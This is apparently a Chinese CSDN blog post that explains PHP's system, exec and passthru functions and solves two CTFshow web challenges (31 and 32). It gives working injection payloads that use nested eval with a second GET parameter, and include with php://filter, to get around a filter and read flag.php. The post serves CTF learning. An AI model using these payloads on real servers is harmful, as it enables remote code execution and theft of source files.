命令执行总结

最新推荐文章于 2024-05-28 14:55:00 发布
最新推荐文章于 2024-05-28 14:55:00 发布
阅读量74 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45694932/article/details/132354865
版权 
执行外部命令的函数
system() exec() passthru()
system() 输出并返回最后一行shell结果。
exec() 不输出结果,返回最后一行shell结果,所有结果可以保存到一个返回的数组里面。
passthru() 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上。
相同点:都可以获得命令执行的状态码

CTFshow web 31
在这里插入图片描述

嵌套异或逃逸:

&符号作为连接,并且。
使用GET的a作为一个参数,传给c,再给1一个赋值,这样就可以跳过对c的过滤。

payload:c=eval($_GET[a]);&a=echo exec(“cat flag.php”);

CTFshow web 32
在这里插入图片描述

嵌套include文件包含,利用伪协议文件包含。

payload:c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php<?php

filter:通过指定的通道来读取指定的文件
这里使用base64读取
不用base64读不到源文件

cop_g
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kafka常用操作命令总结
congge
05-21 7124
前言 在使用kafka开发和运维的时候,经常需要进行一些常用的调试操作,比如创建topic,删除topic,测试从producer发消息给consumer等,这时可以使用kafka提供的常用的命令行工具进行操作,相比可视化工具某些时候可能更有效,下面将列出常用的操作操作命令方便后续运维使用时候查找 1、kafka启动命令 服务器上安装完zookeeper并配置好kafka的环境后,进入kafka的bin目录下 可以看到,在该目录下保存了许多的以sh结尾的文件,就可以使用这些脚本文件完成对kafka的命令
MSsql2005(Sa)权限执行命令总结.txt
07-18
权限执行命令总结权限执行命令总结
CTF-命令执行部分总结
weixin_44770698的博客
05-29 1660
因为自己是小白,还是想着尽量快一点的学习到许多知识,最近又做了CTFshow里面的部分萌新题,这里总结一下其中的部分萌新WEB题。 web 9 要求我们使用GET方式传入c参数,参数中还要匹配到system或者exec等关键字,这里算是一个小坑,还以为是不能有这些关键字,还尝试了passthru、和拼接绕过......很尴尬。 这个比较简单我们使用system来执行查看config.php就可以了。 web 10 这个题的含义就是正则匹配到system、exec等,则会提示你cmd e
Linux常用命令总结
qq_45704528的博客
08-15 3万+
Linux常用命令总结 目录Linux常用命令总结服务器关机相关命令2.系统目录结构介绍3.文件操作相关命令4.文件的基本属性5.文件的内容查看6.Vim7.进程相关命令 服务器关机相关命令 关机指令为:shutdown ; sync # 将数据由内存同步到硬盘中。 shutdown # 关机指令,你可以man shutdown 来看一下帮助文档。例如你可以运行如下命令关机: shutdown –h 10 # 这个命令告诉大家,计算机将在10分钟后关机 shutdown –h now # 立马关机
linux后台运行命令总结
abc
08-19 6223
但万一网络不好,(比如我这儿的破校园网,高峰时几秒钟断一次),终端突然和服务器之间的连接断了,那脚本就会自动停了(因为运行test.sh进程的父进程就是当前的shell终端进程,关闭当前shell终端时,父进程退出,会发送hangup信号给所有子进程,子进程收到hangup以后也会退出)。nohup:不挂断的运行,注意并没有后台运行的功能,就是指用nohup运行命令可以使命令永久的执行下去,和用户终端没有关系,例如我们断开SSH连接都不会影响他的运行,注意了nohup没有后台运行的意思;
Docker常用命令总结
热门推荐
m0_62946761的博客
02-16 3万+
docker常用命令解释及总结,简洁明了,清晰易懂
命令注入总结
weixin_44576725的博客
12-15 6236
文章目录命令注入总结原理常见的危险函数PHPsystemexecpassthrushell_execpopenproc_open反引号Pythonsystempopensubprocess.call/subprocess.runspawnJavajava.lang.Runtime.getRuntime().exec(command)Linux下常用的符号特殊符号通配符常用绕过命令分隔与执行多条命令空格绕过绕过 escapeshellcmd黑名单绕过无参数rce过滤字母或数字常用读取文件方式常用读取目录方式利
命令执行汇总
qq_50613938的博客
11-03 3029
命令执行函数 eval ?@System Assert 命令执行 linux命令分号&&和&,|和||的用法。 “;”分号用法 方式:command1 ; command2 用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行, 彼此之间不关心是否失败, 所有命令都会执行。 彼此不关联 “| ”管道符用法 上一条命令的输出,作为下一条命令参数。ctf里面:ping 127.0.0.1 | ls(只执行ls不执行前面的) 方式:command1 | command Lin
命令执行写Webshell总结
hackzkaq的博客
07-20 4511
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 前言 当我们找到一个rce漏洞却无法反弹shell时,在web路径写webshell用连接工具进行管理会方便的多,本文总结命令执行到webshell的流程化操作。 寻找web路径 写webshell当然要写在web路径,第一步要做的就是快速寻找web路径 1.文件查找法 一般web路径一定会有index.html\php\jsp\asp,login.xxx文件。可以根据已知页面文件名全局搜索 linux: find / -name ind
Linux 远程连接Windows执行命令方法总结
sojrs_sec的博客
09-20 5746
winexe winexe在kali里面自带,用于在linux平台连接windows机器 环境要求:开启文件共享,即smb服务;禁用UAC远程限制 pth-winexe -U username%password //remote_ip cmd.exe --system 支持ntlm hash直接登录 若报错 E_md4hash wrapper called. ERROR: CreateSe...
Android查看内存命令总结
Crazy程序猿
03-13 5242
Android查看内存命令总结
开始运行命令总结
08-18
开始运行命令总结 开始运行命令总结
Linux pidof命令使用总结
01-11
一、什么是pidof命令? 代码如下:#man pidof中的解释:pidof — find the process ID of a running program.pidof–用于查找一个运行的...二、pidof命令的参数-s 表示只返回1个 pid-x 表示同时返回运行给定程序的 she
Linux pstack命令总结
01-20
pstack 命令必须由相应进程的属主或root账号运行。可以使用pstack来确定进程挂起的位置。此命令只有一个参数,那是pid,具体关于pstack的介绍可以查看man手册,如下所示: [root@DB-Server ~]# man pstack PSTACK...
常用Linux命令总结
01-20
Ctrl+C:发送中断信号用于终止命令执行; Ctrl+D:输入EOF(End Of File),中止输入; Ctrl+A:光标置行首; Ctrl+E:光标置行尾; Ctrl+W:删除光标上一个词(空格分隔); Ctrl + Insert :复制; Shift +Insert:...
Steamdeck使用Windows系统游玩雪地奔驰时闪退问题解决方法
最新发布
fxalll的博客
05-28 330
在github正好有一个叫dxvk的库,能够基于vulkan实现d3d11,因此我们访问https://github.com/doitsujin/dxvk,从 Releases下载dxvk-2.3.1.tar.gz(当前最新版本),解压压缩包,在x64 目录中获取 dxgi.dll 和 d3d11.dll,并将两个dll文件放进Snowrunner.exe根目录所在的位置,再次启动游戏,游戏果然正常运行了。因此我自己分析终于解决该问题。困扰我两天的问题终于解决了,也算这个小众游戏全网的第一个解决方案吧。
【Web】CISCN 2024初赛 题解(全)
uuzeray的博客
05-21 1350
这里注意细节,靶机发了两次请求,第一次我们就返回一个正常的图片,第二次请求就发一个302,php代码块要用html标签包裹。注意下面这段报错,因为加不了引号,开头是数字的话,就会将类型识别为数字,若后续出现了字符串就会报错。再打sqlite,指定tableName,加载写入的恶意so文件,反弹shell。最后注意要将获取的变量元组转字符串,再用逗号分隔,依次输出,从而绕过seed。考的python栈帧沙箱逃逸,获取到外部的栈帧,就可以用。因为ban了引号,考虑hex2bin,将数字转为字符串。
uniapp高校二手书交易商城回收系统 微信小程序python+java+node.js+php
QQ1304979694的博客
05-24 536
每年因为有大量的学生在接受教育,每到大学毕业季的时候,所使用的大量书籍对他们自己来说,很多是没有用,同时由于书籍多和不方便携带,导致很多大学生在毕业时将教材直接丢弃是在校大学生处理已用教材的一种主要方式。基于上述因素,同时随着校园环保热潮、倡导绿色校园等号召兴起,所以设立二手书交易小程序是很必要的,一个可以提供给想将书卖出去的人,以及想购买二手书的学生一个平台,方便更好的进行资源再利用、减轻学生的经济负担、促进高校二手书的流通,共建绿色校园。开发出一种实用性强,可靠性好,操作便捷的校园二手书交易小程序。
【全开源】沃德商协会管理系统源码(FastAdmin+ThinkPHP+Uniapp)
u011092458的博客
05-25 697
一款基于FastAdmin+ThinkPHP+Uniapp开发的商协会系统,新一代数字化商协会运营管理系统,以“智慧化会员体系、智敏化内容运营、智能化活动构建”三大板块为基点,实施功能全场景覆盖,一站式解决商协会需求壁垒,有效快速建立自有数字化管理体系、提升组织管理效能、增强会员粘性、沟通连接市场,真正做到为构建有影响力的现代化智慧型组织赋能。数据决策支持:沃德商协会管理系统源码提供的数据统计和分析功能,为商协会提供了宝贵的决策支持,帮助商协会更好地了解市场需求和会员需求,制定更精准的发展战略。
linux常用命令总结
03-17
Linux 常用命令总结: 1. ls - 用来查看当前目录下的文件和文件夹。 2. cd - 用来切换目录。 3. mkdir - 用来创建文件夹。 4. touch - 用来创建文件。 5. cp - 用来复制文件和文件夹。 6. mv - 用来移动或重命名文件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值